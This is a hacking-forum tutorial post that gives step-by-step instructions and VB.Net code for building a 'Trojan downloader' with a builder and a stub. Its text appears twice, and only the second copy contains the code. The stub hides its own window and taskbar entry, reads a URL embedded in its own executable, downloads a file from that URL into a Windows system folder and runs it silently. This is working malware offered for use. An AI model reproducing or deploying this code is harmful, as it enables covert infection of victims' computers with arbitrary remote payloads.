[VB.Net] Make your own Trojan Downloader 01-31-2011, 02:11 PM
#1
hi guys this is one of my tut's which i thought might help you.
Step 1:
Start a new project. Open Visual Studio Again and start another new project.
name the first project "Builder" and the second "Stub".
Step 2:
On the builder project add 1 text box and name it to "txtdl" and add a new button below it and set its name to "btnbld" and its text to "Build". Now add a textbox and name it "dldir" and make its size half the first textbox then set its text to "C:\WINDOWS\".
Step 3:
Add a new textbox and name it to "yourserver" and set its text to "server" then add another textbox next to it and name it "yourext" and set its text to ".exe".
Step 4:
You can decorate your Trojan Downloader with label's explaining to the user how to work with it. Your finished form's designer should look like something like this:
![[Image: i55558_looklikethis.JPG]](http://015.img98.net/out.php/i55558_looklikethis.JPG)
Step 5:
Now double click the btnbuild button and add this code:
Step 6:
Now go in the Stub project. Double click the form and add this:
Step 7:
Now in the stub below the codes from the last step add this:
Step 8:
Just build your server by giving a link to txtdl.text and setting its path like "C:\" or "C:\WINDOWS\System32".
and Wham! you made your own VB Trojan Downloader! congratz! :thumbs:
Credits:
1lussion - for giving me the idea to post this :thumbs:
Coder - for his amazing Stub guide :Thumbs:
Note: This was note leeched or copied from anywhere else. At least a thanks is expected. Please don't leech or if you share please tell the source and the author thank you
Step 1:
Start a new project. Open Visual Studio Again and start another new project.
name the first project "Builder" and the second "Stub".
Step 2:
On the builder project add 1 text box and name it to "txtdl" and add a new button below it and set its name to "btnbld" and its text to "Build". Now add a textbox and name it "dldir" and make its size half the first textbox then set its text to "C:\WINDOWS\".
Step 3:
Add a new textbox and name it to "yourserver" and set its text to "server" then add another textbox next to it and name it "yourext" and set its text to ".exe".
Step 4:
You can decorate your Trojan Downloader with label's explaining to the user how to work with it. Your finished form's designer should look like something like this:
Step 5:
Now double click the btnbuild button and add this code:
Code:
io.file.copy(CurDir() & "\stub.exe", curdir & "\" & yourserver.Text & yourext.Text)
io.file.appendalltext(CurDir() & "\" & yourserver.Text & yourext.Text, "FileSpilt" & txtdl.Text & "FileSpilt" & dldir.Text)
MsgBox("Built!", msgboxstyle.Information)Step 6:
Now go in the Stub project. Double click the form and add this:
Code:
me.height = 0
me.width = 0
me.opacity = 0
me.hide
me.visible = false
me.showintaskbar = false
me.showicon = falseStep 7:
Now in the stub below the codes from the last step add this:
Code:
Dim txtdl, dldir As String
Dim BinText As String = IO.File.ReadAllText(Application.ExecutablePath)
If BinText.Contains("FileSpilt") = False Then Exit Sub
Dim ArrContents() As String = Split(BinText, "FileSpilt")
txtdl = ArrContents(1)
dldir = ArrContents(2)
Try
my.computer.network.downloadfile(txtdl, dldir & "/server.exe")
system.diagnostics.process.start(dldir & "/server.exe")
me.close()
catch ex as exception
end tryStep 8:
Just build your server by giving a link to txtdl.text and setting its path like "C:\" or "C:\WINDOWS\System32".
and Wham! you made your own VB Trojan Downloader! congratz! :thumbs:
Credits:
1lussion - for giving me the idea to post this :thumbs:
Coder - for his amazing Stub guide :Thumbs:
Note: This was note leeched or copied from anywhere else. At least a thanks is expected. Please don't leech or if you share please tell the source and the author thank you
Pierce the life fibers with your drill.
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)

I have creds ![[Image: 5DQAS.gif]](http://dragcave.net/image/5DQAS.gif)

![[Image: rytwG00.png]](http://i.imgur.com/rytwG00.png)